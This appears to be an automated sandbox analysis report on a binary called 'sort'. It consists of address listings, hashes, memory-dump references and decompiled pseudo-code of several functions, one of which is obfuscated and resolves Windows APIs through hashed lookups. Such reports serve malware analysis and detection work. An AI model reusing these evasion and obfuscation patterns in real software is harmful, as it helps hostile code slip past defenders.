0x0227156e
0x02271574
0x02271578
0x0227157f
0x00000000
0x0227157f
0x02271499
0x02271499
0x022714e6
0x022714fe
0x022714fe
0x022714ff
0x02271510
0x0227151d
0x02271523
0x02271528
0x0227152b
0x0227152e
0x02271531
0x02271534
0x02271534
0x02271534
0x02271537
0x0227153b
0x0227153b
0x0227153f
0x02271545
0x02271548
0x0227154d
0x00000000
0x0227149b
0x0227149b
0x022714a0
0x022714cb
0x022714d0
0x022714d4
0x022714d9
0x00000000
0x022714a2
0x022714a2
0x022714a7
0x02271879
0x0227187b
0x02271880
0x0227188e
0x00000000
0x00000000
0x00000000
0x022714a7
0x022714a0
0x02271499
0x0227130c
0x0227130c
0x02271452
0x02271457
0x02271459
0x0227146c
0x02271471
0x02271471
0x02271476
0x02271478
0x0227147c
0x02271480
0x02271484
0x00000000
0x02271312
0x02271312
0x02271317
0x02271414
0x02271419
0x00000000
0x0227141f
0x0227142f
0x02271434
0x02271438
0x0227143b
0x02271441
0x02271448
0x00000000
0x02271448
0x0227131d
0x0227131d
0x022713b5
0x022713b7
0x022713bc
0x022713be
0x022713d1
0x022713d6
0x022713d6
0x022713f6
0x022713f8
0x022713fd
0x02271402
0x02271406
0x0227140b
0x00000000
0x02271323
0x02271328
0x02271394
0x02271399
0x0227139d
0x022713a2
0x00000000
0x0227132a
0x0227132f
0x00000000
0x02271335
0x0227133b
0x02271343
0x02271345
0x02271349
0x02271353
0x0227135c
0x0227135d
0x02271364
0x02271369
0x0227136d
0x02271371
0x02271375
0x02271375
0x0227137a
0x0227137a
0x0227137e
0x02271382
0x02271387
0x00000000
0x02271387
0x0227132f
0x02271328
0x0227131d
0x02271317
0x0227130c
0x02271306
0x00000000
0x022712fb
0x022715f0
0x022715f5
0x0227174c
0x02271751
0x02271845
0x0227184d
0x02271855
0x02271859
0x0227185e
0x02271864
0x02271868
0x0227186f
0x00000000
0x02271757
0x02271757
0x0227175c
0x022717c0
0x022717c5
0x022717cb
0x022717cd
0x022717cf
0x022717e7
0x022717e9
0x022717e9
0x022717ef
0x022717f5
0x02271813
0x02271815
0x0227181a
0x0227181f
0x02271824
0x02271828
0x0227182c
0x02271837
0x0227183b
0x00000000
0x0227175e
0x0227175e
0x02271763
0x00000000
0x02271769
0x02271779
0x02271782
0x02271784
0x02271788
0x0227178a
0x00000000
0x02271790
0x02271795
0x02271796
0x0227179c
0x0227179e
0x022717a1
0x022717a5
0x022717a7
0x00000000
0x022717ad
0x022717ad
0x022717b1
0x00000000
0x022717b1
0x022717a7
0x0227178a
0x02271763
0x0227175c
0x022715fb
0x022715fb
0x022716e5
0x022716ea
0x022716ec
0x022716ff
0x02271704
0x02271704
0x0227170b
0x0227170d
0x02271712
0x02271714
0x02271727
0x0227172c
0x0227172c
0x02271738
0x0227173a
0x0227173e
0x02271743
0x00000000
0x02271601
0x02271601
0x02271606
0x022716bf
0x022716c4
0x00000000
0x022716ca
0x022716ce
0x022716d3
0x022716d7
0x022716dc
0x00000000
0x022716dc
0x0227160c
0x0227160c
0x0227169f
0x022716a4
0x022716aa
0x022716ae
0x022716b5
0x00000000
0x02271612
0x02271612
0x02271617
0x02271680
0x02271685
0x02271689
0x0227168e
0x00000000
0x02271619
0x02271619
0x0227161e
0x00000000
0x02271624
0x0227162c
0x02271631
0x02271639
0x02271641
0x02271649
0x02271651
0x02271656
0x0227165b
0x0227165f
0x02271662
0x02271668
0x0227166f
0x00000000
0x0227166f
0x0227161e
0x02271617
0x0227160c
0x02271606
0x022715fb
0x00000000
0x022714ad
0x022714ad
0x022714ad
0x022714c6
0x00000000
0x022714c6

Strings

Ei, xrefs: 022713C0
E?*, xrefs: 02271601
a7a&, xrefs: 02271612
Ei, xrefs: 022717D1
8K, xrefs: 022717EF, 0227181F
a7a&, xrefs: 02271548

Memory Dump Source

Source File: 00000001.00000002.931690638.0000000002271000.00000020.00000001.sdmp, Offset: 02270000, based on PE: true

Associated: 00000001.00000002.931684475.0000000002270000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.931699903.000000000227D000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.931707027.0000000002280000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2270000_sort.jbxd

Yara matches

Similarity

API ID:
String ID: 8K$E?*$a7a&$a7a&$Ei$Ei
API String ID: 0-3409945958
Opcode ID: 22d97df8ea24bb3fde94b5d1e74d944d7ca6bbea8ab982c4d4056d8fb136de7f
Instruction ID: 9f555a3d82cb8eb9a38dadd34963eddec330714abd831a00f3e5ca2195d6a092
Opcode Fuzzy Hash: 22d97df8ea24bb3fde94b5d1e74d944d7ca6bbea8ab982c4d4056d8fb136de7f
Instruction Fuzzy Hash: A1E19E7162C3428BC718DFA4D490A6FB3E6AFC4344F14492DE89ADB348DB74E915CB92

Uniqueness

Uniqueness Score: -1.00%

Function 0041D3C1, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 175
COMMON

Download Yara Rule

C-Code - Quality: 38%

			E0041D3C1(intOrPtr __ecx, void* __edx, intOrPtr _a4, RECT* _a8) {
				struct tagRECT _v20;
				struct tagRECT _v36;
				char _v296;
				void* __ebp;
				int _t61;
				signed char _t64;
				signed char _t69;
				void* _t79;
				struct HWND__* _t81;
				intOrPtr _t109;
				signed int _t115;
				signed int _t117;
				void* _t130;
				signed int _t131;
				intOrPtr _t134;
				void* _t136;

				_t130 = __edx;
				_t134 = _a4;
				_t109 = __ecx;
				_t61 = GetWindowRect( *(_t134 + 0x1c),  &_v36);
				if( *((intOrPtr*)(_t134 + 0x70)) != _t109) {
					L3:
					if( *((intOrPtr*)(_t109 + 0x78)) != 0 && ( *(_t134 + 0x68) & 0x00000040) != 0) {
						 *(_t109 + 0x64) =  *(_t109 + 0x64) | 0x00000040;
					}
					 *(_t109 + 0x64) =  *(_t109 + 0x64) & 0xfffffff9;
					_t64 =  *(_t134 + 0x64) & 0x00000006 |  *(_t109 + 0x64);
					 *(_t109 + 0x64) = _t64;
					if((_t64 & 0x00000040) == 0) {
						E004165E5(_t134,  &_v296, 0x104);
						E0041A843( *(_t109 + 0x1c),  &_v296);
					}
					_t69 = ( *(_t109 + 0x64) ^  *(_t134 + 0x64)) & 0x0000f000 ^  *(_t134 + 0x64) | 0x0000000f;
					if( *((intOrPtr*)(_t109 + 0x78)) == 0) {
						_t70 = _t69 & 0x000000fe;
						__eflags = _t69 & 0x000000fe;
					} else {
						_t70 = _t69 | 0x00000001;
					}
					E004263C3(_t134, _t70);
					_t131 = E0041DCB9(_t109, GetDlgCtrlID( *(_t134 + 0x1c)) & 0x0000ffff, 0xffffffff);
					if(_t131 > 0) {
						 *((intOrPtr*)( *((intOrPtr*)(_t109 + 0x80)) + _t131 * 4)) = _t134;
					}
					if(_a8 == 0) {
						__eflags = _t131 - 1;
						if(_t131 < 1) {
							_t132 = _t109 + 0x7c;
							E0041158A(_t109 + 0x7c,  *((intOrPtr*)(_t109 + 0x84)), _t134);
							E0041158A(_t109 + 0x7c,  *((intOrPtr*)(_t132 + 8)), 0);
						}
						_t115 =  *0x439bf4; // 0x2
						__eflags = 0;
						_push(0x115);
						_push(0);
						_push(0);
						_push( ~_t115);
						_t117 =  *0x439bf0; // 0x2
						_push( ~_t117);
						_push(0);
					} else {
						CopyRect( &_v20, _a8);
						E0041A2F1(_t109,  &_v20);
						if(_t131 < 1) {
							asm("cdq");
							asm("cdq");
							_push((_v20.bottom - _v20.top - _t130 >> 1) + _v20.top);
							_push((_v20.right - _v20.left - _t130 >> 1) + _v20.left);
							asm("movsd");
							asm("movsd");
							_push(_a4);
							asm("movsd");
							asm("movsd");
							E0041DD44(_t109);
							_t134 = _a4;
						}
						_push(0x114);
						_push(_v20.bottom - _v20.top);
						_push(_v20.right - _v20.left);
						_push(_v20.top);
						_push(_v20.left);
						_push(0);
					}
					E0041663D(_t134);
					if(E00413740(_t136, GetParent( *(_t134 + 0x1c))) != _t109) {
						if(_t109 != 0) {
							_t81 =  *(_t109 + 0x1c);
						} else {
							_t81 = 0;
						}
						E00413740(_t136, SetParent( *(_t134 + 0x1c), _t81));
					}
					_t120 =  *((intOrPtr*)(_t134 + 0x70));
					_t153 =  *((intOrPtr*)(_t134 + 0x70));
					if( *((intOrPtr*)(_t134 + 0x70)) != 0) {
						E0041D609(_t120, _t153, _t134, 0xffffffff, 0);
					}
					 *((intOrPtr*)(_t134 + 0x70)) = _t109;
					_t79 = E004225AA(_t109, _t153);
					 *(_t79 + 0xb8) =  *(_t79 + 0xb8) | 0x0000000c;
					return _t79;
				}
				if(_a8 != 0) {
					_t61 = EqualRect( &_v36, _a8);
					if(_t61 == 0) {
						goto L3;
					}
				}
				return _t61;
			}

APIs

GetWindowRect.USER32 ref: 0041D3D9
EqualRect.USER32 ref: 0041D3F5
GetDlgCtrlID.USER32 ref: 0041D476
CopyRect.USER32 ref: 0041D4A3
GetParent.USER32(?), ref: 0041D554
SetParent.USER32(?,?,00000000), ref: 0041D573

Strings

@, xrefs: 0041D40F

Memory Dump Source

Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_sort.jbxd

Similarity

API ID: Rect$Parent$CopyCtrlEqualWindow
String ID: @
API String ID: 3581194824-2766056989
Opcode ID: 2ea802bbfde414efe59f16374f298989db8c13d0e5b755017994176e5bba3002
Instruction ID: 8366d14a4fbab590a3c5e893c5bf745e495171ad1a8ef82a64abe53d0d133945
Opcode Fuzzy Hash: 2ea802bbfde414efe59f16374f298989db8c13d0e5b755017994176e5bba3002
Instruction Fuzzy Hash: 88518FB1A00615ABDF14DF69CC85AEE77AAEB44308F00452AE912D72A1DB38E985CB54

Uniqueness

Uniqueness Score: -1.00%

Function 02279FC8, Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 93
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E02279FC8(void* __eax, void* __ebx, void* __ebp, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, char _a36, char _a40, char _a44, intOrPtr _a48, char _a56, char _a576) {
				intOrPtr* _v0;
				intOrPtr _v8;
				intOrPtr _v12;
				void* _t37;
				signed int _t38;
				intOrPtr* _t41;
				signed int _t44;
				intOrPtr* _t47;
				intOrPtr* _t49;
				intOrPtr* _t53;
				intOrPtr* _t54;
				intOrPtr* _t56;
				intOrPtr* _t60;
				intOrPtr* _t62;
				intOrPtr* _t66;
				intOrPtr _t70;
				intOrPtr* _t71;
				intOrPtr* _t75;
				signed int _t76;
				signed int _t82;
				intOrPtr* _t95;
				intOrPtr _t98;
				char* _t100;
				intOrPtr _t101;
				intOrPtr _t134;
				intOrPtr* _t146;
				void* _t148;
				intOrPtr _t149;
				void* _t150;
				intOrPtr _t154;
				intOrPtr _t155;
				intOrPtr _t156;
				char* _t157;
				void* _t158;
				char _t161;
				intOrPtr _t165;
				void* _t166;
				void* _t170;
				void* _t171;

				_t37 = __eax;
				goto L3;
				do {
					while(1) {
						L3:
						_t170 = _t37 - 0x1bec2acf;
						if(_t170 > 0) {
							goto L41;
						}
						L4:
						if(_t170 == 0) {
							_t54 =  *0x227dea8;
							__eflags = _t54;
							if(_t54 == 0) {
								_t100 = E02273F20(0xbb398380);
								_t54 = E02273E80(_t95, _t100, 0x97f883e, _t161);
								 *0x227dea8 = _t54;
							}
							_t148 =  *_t54();
							_t56 =  *0x227e1a0;
							__eflags = _t56;
							if(_t56 == 0) {
								_t100 = E02273F20(0xbb398380);
								_t56 = E02273E80(_t95, _t100, 0x26c3f343, _t161);
								 *0x227e1a0 = _t56;
							}
							 *_t56(_t148, 0, _t95);
							_t149 = _a12;
							_t37 = 0x1dedf83c;
							continue;
						} else {
							_t171 = _t37 - 0x191840a9;
							if(_t171 > 0) {
								__eflags = _t37 - 0x1a29c84b;
								if(_t37 == 0x1a29c84b) {
									_t60 =  *0x227dea8;
									__eflags = _t60;
									if(_t60 == 0) {
										_t100 = E02273F20(0xbb398380);
										_t60 = E02273E80(_t95, _t100, 0x97f883e, _t161);
										 *0x227dea8 = _t60;
									}
									_t150 =  *_t60();
									_t62 =  *0x227dcec;
									__eflags = _t62;
									if(_t62 == 0) {
										_t100 = E02273F20(0xbb398380);
										_t62 = E02273E80(_t95, _t100, 0xe9233692, _t161);
										 *0x227dcec = _t62;
									}
									_t53 =  *_t62(_t150, 8, 0x48);
									_a16 = _t53;
									__eflags = _t53;
									if(_t53 == 0) {
										L59:
										return _t53;
									} else {
										_t149 = _a12;
										_t37 = 0x1fc710ef;
										continue;
									}
								} else {
									__eflags = _t37 - 0x1a44b2a5;
									if(_t37 != 0x1a44b2a5) {
										break;
									} else {
										_t157 = E022734C0(0x227da50);
										_t66 =  *0x227dc60;
										__eflags = _t66;
										if(_t66 == 0) {
											_t66 = E02273E80(_t95, E02273F20(0xe66945e6), 0xcca28b0d, _t161);
											 *0x227dc60 = _t66;
										}
										 *_t66( &_a56, 0x104, _t157,  &_a576, _t95);
										_t166 = _t166 + 0x14;
										_t100 = _t157;
										E02273460(_t100);
										_t149 = _a24;
										_t37 = 0x10f8a433;
										continue;
									}
								}
							} else {
								if(_t171 == 0) {
									_t101 = _a28;
									 *((intOrPtr*)(_t101 + 0x24)) = _t149;
									_t70 =  *0x227e2dc; // 0x0
									 *((intOrPtr*)(_t101 + 0x20)) = _t70;
									 *0x227e2dc = _t101;
									return _t70;
								} else {
									if(_t37 == 0xa70e03e) {
										_t71 =  *0x227dc70;
										__eflags = _t71;
										if(_t71 == 0) {
											_t100 = E02273F20(0xbb398380);
											_t71 = E02273E80(_t95, _t100, 0x560d239b, _t161);
											 *0x227dc70 = _t71;
										}
										 *_t71(_a44);
										_t37 = 0x191840a9;
										continue;
									} else {
										if(_t37 == 0x10f8a433) {
											_push(0);
											_push(_t100);
											_t100 = 0;
											E02274BA0(_t95, 0,  &_a56, _t161, 1);
											_t166 = _t166 + 0xc;
											_t37 = 0x1bec2acf;
											continue;
										} else {
											if(_t37 != 0x18d473c5) {
												break;
											} else {
												_t154 =  *0x227e2ec; // 0x4d9470
												_t75 =  *0x227e024;
												_t155 = _t154 + 0x278;
												_a48 = _t155;
												if(_t75 == 0) {
													_t100 = E02273F20(0xbb398380);
													_t75 = E02273E80(_t95, _t100, 0x5262aefc, _t161);
													 *0x227e024 = _t75;
												}
												_t76 =  *_t75(_t155);
												_t156 =  *0x227ded0;
												_a48 = 2 + _t76 * 2;
												if(_t156 == 0) {
													_t100 = E02273F20(0xbb398380);
													_t156 = E02273E80(_t95, _t100, 0x23563937, _t161);
													 *0x227ded0 = _t156;
												}
												_t165 = _t156;
												if(_t156 == 0) {
													_t100 = E02273F20(0xbb398380);
													_t156 = E02273E80(_t95, _t100, 0x23563937, _t165);
													 *0x227ded0 = _t156;
												}
												_t98 = _t156;
												if(_t156 == 0) {
													_t100 = E02273F20(0xbb398380);
													 *0x227ded0 = E02273E80(_t98, _t100, 0x23563937, _t165);
												}
												_t146 =  *0x227dce8; // 0x0
												if(_t146 == 0) {
													_t100 = E02273F20(0xbb398380);
													_t146 = E02273E80(_t98, _t100, 0xb310a228, _t165);
													 *0x227dce8 = _t146;
												}
												_t82 =  *_t146(GetCurrentProcess(), GetCurrentProcess(), GetCurrentProcess(),  &_a40, 0x100000, 1, 0);
												_t149 = _v8;
												_t134 = _v12;
												asm("sbb eax, eax");
												_t37 = ( ~_t82 & 0x069deb97) + 0x1f9eb481;
												_t95 = _v0;
												L2:
												_t161 = _a36;
												while(1) {
													L3:
													_t170 = _t37 - 0x1bec2acf;
													if(_t170 > 0) {
														goto L41;
													}
													goto L4;
												}
												goto L41;
											}
										}
									}
								}
							}
						}
						L60:
						L41:
						__eflags = _t37 - 0x1fc710ef;
						if(__eflags > 0) {
							__eflags = _t37 - 0x263ca018;
							if(_t37 == 0x263ca018) {
								_t100 =  &_a44;
								_t38 = E0227B3A0(_t100,  &_a36);
								asm("sbb eax, eax");
								_t37 = ( ~_t38 & 0x28f9ad68) + 0xa70e03e;
								goto L2;
							} else {
								__eflags = _t37 - 0x336a8da6;
								if(_t37 != 0x336a8da6) {
									break;
								} else {
									_t100 = _t161;
									_t41 = E02271140(_a40);
									_t134 = _a20;
									_t95 = _t41;
									__eflags = _t95;
									_a32 = _t95;
									_t37 =  !=  ? 0x1a44b2a5 : 0x1dedf83c;
									continue;
								}
							}
						} else {
							if(__eflags == 0) {
								_t100 = _t149;
								_t44 = E0227AB50(_t100, _t134,  &_a576);
								_t134 = _a20;
								_t166 = _t166 + 4;
								asm("sbb eax, eax");
								_t37 = ( ~_t44 & 0xf935bf44) + 0x1f9eb481;
								continue;
							} else {
								__eflags = _t37 - 0x1dedf83c;
								if(_t37 == 0x1dedf83c) {
									_t47 =  *0x227dea8;
									__eflags = _t47;
									if(_t47 == 0) {
										_t100 = E02273F20(0xbb398380);
										_t47 = E02273E80(_t95, _t100, 0x97f883e, _t161);
										 *0x227dea8 = _t47;
									}
									_t158 =  *_t47();
									_t49 =  *0x227e1a0;
									__eflags = _t49;
									if(_t49 == 0) {
										_t100 = E02273F20(0xbb398380);
										_t49 = E02273E80(_t95, _t100, 0x26c3f343, _t161);
										 *0x227e1a0 = _t49;
									}
									 *_t49(_t158, 0, _t161);
									_t149 = _a12;
									_t37 = 0xa70e03e;
									_t134 = _a8;
									continue;
								} else {
									__eflags = _t37 - 0x1f9eb481;
									if(_t37 == 0x1f9eb481) {
										_t53 = E02274250(_t95, _a28);
										goto L59;
									} else {
										break;
									}
								}
							}
						}
						goto L60;
					}
					__eflags = _t37 - 0x1c40b504;
				} while (_t37 != 0x1c40b504);
				return _t37;
				goto L60;
			}

0x02279fc8
0x02279fc8
0x02279fd0
0x02279fd0
0x02279fd0
0x02279fd0
0x02279fd5
0x00000000
0x00000000
0x02279fdb
0x02279fdb
0x0227a25f
0x0227a264
0x0227a266
0x0227a277
0x0227a279
0x0227a27e
0x0227a27e
0x0227a285
0x0227a287
0x0227a28c
0x0227a28e
0x0227a29f
0x0227a2a1
0x0227a2a6
0x0227a2a6
0x0227a2af
0x0227a2b1
0x0227a2b5
0x00000000
0x02279fe1
0x02279fe1
0x02279fe6
0x0227a17a
0x0227a17f
0x0227a1ee
0x0227a1f3
0x0227a1f5
0x0227a206
0x0227a208
0x0227a20d
0x0227a20d
0x0227a214
0x0227a216
0x0227a21b
0x0227a21d
0x0227a22e
0x0227a230
0x0227a235
0x0227a235
0x0227a23f
0x0227a241
0x0227a245
0x0227a247
0x0227a40c
0x0227a416
0x0227a24d
0x0227a24d
0x0227a251
0x00000000
0x0227a256
0x0227a181
0x0227a181
0x0227a186
0x00000000
0x0227a18c
0x0227a196
0x0227a198
0x0227a19d
0x0227a19f
0x0227a1b2
0x0227a1b7
0x0227a1b7
0x0227a1d0
0x0227a1d2
0x0227a1d5
0x0227a1d7
0x0227a1dc
0x0227a1e0
0x00000000
0x0227a1e5
0x0227a186
0x02279fec
0x02279fec
0x0227a3e3
0x0227a3e7
0x0227a3ea
0x0227a3ef
0x0227a3f2
0x0227a402
0x02279ff2
0x02279ff7
0x0227a142
0x0227a147
0x0227a149
0x0227a15a
0x0227a15c
0x0227a161
0x0227a161
0x0227a16a
0x0227a170
0x00000000
0x02279ffd
0x0227a002
0x0227a121
0x0227a123
0x0227a12a
0x0227a12c
0x0227a135
0x0227a138
0x00000000
0x0227a008
0x0227a00d
0x00000000
0x0227a013
0x0227a013
0x0227a019
0x0227a01e
0x0227a024
0x0227a02a
0x0227a03b
0x0227a03d
0x0227a042
0x0227a042
0x0227a048
0x0227a04a
0x0227a057
0x0227a05d
0x0227a06e
0x0227a075
0x0227a077
0x0227a077
0x0227a07d
0x0227a081
0x0227a092
0x0227a099
0x0227a09b
0x0227a09b
0x0227a0a1
0x0227a0a5
0x0227a0b6
0x0227a0bf
0x0227a0bf
0x0227a0c5
0x0227a0cd
0x0227a0de
0x0227a0e5
0x0227a0e7
0x0227a0e7
0x0227a104
0x0227a106
0x0227a10c
0x0227a110
0x0227a117
0x02279fb9
0x02279fc2
0x02279fc2
0x02279fd0
0x02279fd0
0x02279fd0
0x02279fd5
0x00000000
0x00000000
0x00000000
0x02279fd5
0x00000000
0x02279fd0
0x0227a00d
0x0227a002
0x02279ff7
0x02279fec
0x02279fe6
0x00000000
0x0227a2c3
0x0227a2c3
0x0227a2c8
0x0227a389
0x0227a38e
0x0227a3c3
0x0227a3c7
0x0227a3d2
0x0227a3d9
0x00000000
0x0227a390
0x0227a390
0x0227a395
0x00000000
0x0227a39b
0x0227a39f
0x0227a3a1
0x0227a3a6
0x0227a3aa
0x0227a3ac
0x0227a3ae
0x0227a3b7
0x00000000
0x0227a3b7
0x0227a395
0x0227a2ce
0x0227a2ce
0x0227a367
0x0227a36a
0x0227a36f
0x0227a373
0x0227a378
0x0227a37f
0x00000000
0x0227a2d4
0x0227a2d4
0x0227a2d9
0x0227a2fc
0x0227a301
0x0227a303
0x0227a314
0x0227a316
0x0227a31b
0x0227a31b
0x0227a322
0x0227a324
0x0227a329
0x0227a32b
0x0227a33c
0x0227a33e
0x0227a343
0x0227a343
0x0227a34c
0x0227a34e
0x0227a352
0x0227a357
0x00000000
0x0227a2db
0x0227a2db
0x0227a2e0
0x0227a407
0x00000000
0x00000000
0x00000000
0x00000000
0x0227a2e0
0x0227a2d9
0x0227a2ce
0x00000000
0x0227a2c8
0x0227a2e6
0x0227a2e6
0x0227a2fb
0x00000000

APIs

GetCurrentProcess.KERNEL32(?,00100000,00000001,00000000), ref: 0227A0FB
GetCurrentProcess.KERNEL32(00000000), ref: 0227A0FE
GetCurrentProcess.KERNEL32(00000000), ref: 0227A101

Strings

79V#, xrefs: 0227A0B1
79V#, xrefs: 0227A069
79V#, xrefs: 0227A08D
>p, xrefs: 02279FF2

Memory Dump Source

Source File: 00000001.00000002.931690638.0000000002271000.00000020.00000001.sdmp, Offset: 02270000, based on PE: true

Associated: 00000001.00000002.931684475.0000000002270000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.931699903.000000000227D000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.931707027.0000000002280000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2270000_sort.jbxd

Yara matches

Similarity

API ID: CurrentProcess
String ID: 79V#$79V#$79V#$>p
API String ID: 2050909247-2830606539
Opcode ID: 94530cec8e20c4a094e87683f953fef4140262891607b14345d7a3698d67aad4
Instruction ID: 6982bc5ac6c36f95c538a4700fe7e5c6c75db4bb3636f04e67901887edce0285
Opcode Fuzzy Hash: 94530cec8e20c4a094e87683f953fef4140262891607b14345d7a3698d67aad4
Instruction Fuzzy Hash: 8531A131E6D3529BCA10EAE4644872F32E7ABC8694F190C59E885DB258DF74DC058BD2

Uniqueness

Uniqueness Score: -1.00%

Function 022414A0, Relevance: 12.2, APIs: 8, Instructions: 171COMMON

Download Yara Rule

APIs

SetLastError.KERNEL32(0000007F), ref: 022414DB
SetLastError.KERNEL32(0000007F), ref: 02241507

Memory Dump Source

Source File: 00000001.00000002.931652161.0000000002241000.00000020.00000001.sdmp, Offset: 02241000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2241000_sort.jbxd

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: 54e2e66beb9ceb88c7045b401b919d665d24cdc9c9fcb598676be2aeaa5585a4
Instruction ID: e793679fa580244b210716b553b8e472b3e1de9845278527d005c76fab49ca3d
Opcode Fuzzy Hash: 54e2e66beb9ceb88c7045b401b919d665d24cdc9c9fcb598676be2aeaa5585a4
Instruction Fuzzy Hash: 0D71C674E20109DFDB08DF98C585BADB7B2FF48304F248598D51AAB345DB74EA91CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00409509, Relevance: 12.1, APIs: 8, Instructions: 132
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00409509() {
				int _v4;
				int _v8;
				intOrPtr _t7;
				CHAR* _t9;
				WCHAR* _t17;
				int _t20;
				char* _t24;
				int _t32;
				CHAR* _t36;
				WCHAR* _t38;
				void* _t39;
				int _t42;

				_t7 =  *0x439ed4; // 0x1
				_t32 = 0;
				_t38 = 0;
				_t36 = 0;
				if(_t7 != 0) {
					if(_t7 != 1) {
						if(_t7 != 2) {
							L27:
							return 0;
						}
						L18:
						if(_t36 != _t32) {
							L20:
							_t9 = _t36;
							if( *_t36 == _t32) {
								L23:
								_t41 = _t9 - _t36 + 1;
								_t39 = E00405667(_t9 - _t36 + 1);
								if(_t39 != _t32) {
									E00405700(_t39, _t36, _t41);
								} else {
									_t39 = 0;
								}
								FreeEnvironmentStringsA(_t36);
								return _t39;
							} else {
								goto L21;
							}
							do {
								do {
									L21:
									_t9 =  &(_t9[1]);
								} while ( *_t9 != _t32);
								_t9 =  &(_t9[1]);
							} while ( *_t9 != _t32);
							goto L23;
						}
						_t36 = GetEnvironmentStrings();
						if(_t36 == _t32) {
							goto L27;
						}
						goto L20;
					}
					L6:
					if(_t38 != _t32) {
						L8:
						_t17 = _t38;
						if( *_t38 == _t32) {
							L11:
							_t20 = (_t17 - _t38 >> 1) + 1;
							_v4 = _t20;
							_t42 = WideCharToMultiByte(_t32, _t32, _t38, _t20, _t32, _t32, _t32, _t32);
							if(_t42 != _t32) {
								_t24 = E00405667(_t42);
								_v8 = _t24;
								if(_t24 != _t32) {
									if(WideCharToMultiByte(_t32, _t32, _t38, _v4, _t24, _t42, _t32, _t32) == 0) {
										E004062E0(_v8);
										_v8 = _t32;
									}
									_t32 = _v8;
								}
							}
							FreeEnvironmentStringsW(_t38);
							return _t32;
						} else {
							goto L9;
						}
						do {
							do {
								L9:
								_t17 =  &(_t17[1]);
							} while ( *_t17 != _t32);
							_t17 =  &(_t17[1]);
						} while ( *_t17 != _t32);
						goto L11;
					}
					_t38 = GetEnvironmentStringsW();
					if(_t38 == _t32) {
						goto L27;
					}
					goto L8;
				}
				_t38 = GetEnvironmentStringsW();
				if(_t38 == 0) {
					_t36 = GetEnvironmentStrings();
					if(_t36 == 0) {
						goto L27;
					}
					 *0x439ed4 = 2;
					goto L18;
				}
				 *0x439ed4 = 1;
				goto L6;
			}

APIs

GetEnvironmentStringsW.KERNEL32(?,00000000,?,?,?,?,0040641E), ref: 00409524
GetEnvironmentStrings.KERNEL32(?,00000000,?,?,?,?,0040641E), ref: 00409538
GetEnvironmentStringsW.KERNEL32(?,00000000,?,?,?,?,0040641E), ref: 00409564
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,0040641E), ref: 0040959C
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,0040641E), ref: 004095BE
FreeEnvironmentStringsW.KERNEL32(00000000,?,00000000,?,?,?,?,0040641E), ref: 004095D7
GetEnvironmentStrings.KERNEL32(?,00000000,?,?,?,?,0040641E), ref: 004095EA
FreeEnvironmentStringsA.KERNEL32(00000000), ref: 00409628

Memory Dump Source

Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_sort.jbxd

Similarity

API ID: EnvironmentStrings$ByteCharFreeMultiWide
String ID:
API String ID: 1823725401-0
Opcode ID: c300a98435790b0a112db5af198a1087b81f0d641cfac9594a12296cbced713a
Instruction ID: ef1768683ce44c7a55569678311ee6e18f6548819425519884899f5cccb4810e
Opcode Fuzzy Hash: c300a98435790b0a112db5af198a1087b81f0d641cfac9594a12296cbced713a
Instruction Fuzzy Hash: 023142B35052147FD7313F765C9483BB79CE649358B59093BF482E32C2EA3A8C4286AD

Uniqueness

Uniqueness Score: -1.00%

Function 0041518D, Relevance: 12.1, APIs: 8, Instructions: 120
windowCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E0041518D(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, struct tagRECT* _a20, intOrPtr _a24, intOrPtr _a28) {
				int _v8;
				intOrPtr _v12;
				int _v16;
				int _v20;
				struct tagRECT _v36;
				void* _v40;
				void* __ebp;
				int _t56;
				intOrPtr* _t57;
				signed short _t62;
				void* _t63;
				void* _t67;
				intOrPtr* _t80;
				signed int _t83;
				struct HWND__* _t86;
				void* _t87;

				_t67 = __ecx;
				_v8 = 0;
				_v12 = _a28;
				_v16 = 0;
				_v20 = 0;
				if(_a24 == 0) {
					GetClientRect( *(__ecx + 0x1c),  &_v36);
				} else {
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
				}
				if(_a16 == 1) {
					_v40 = _v40 & 0x00000000;
				} else {
					_v40 = BeginDeferWindowPos(8);
				}
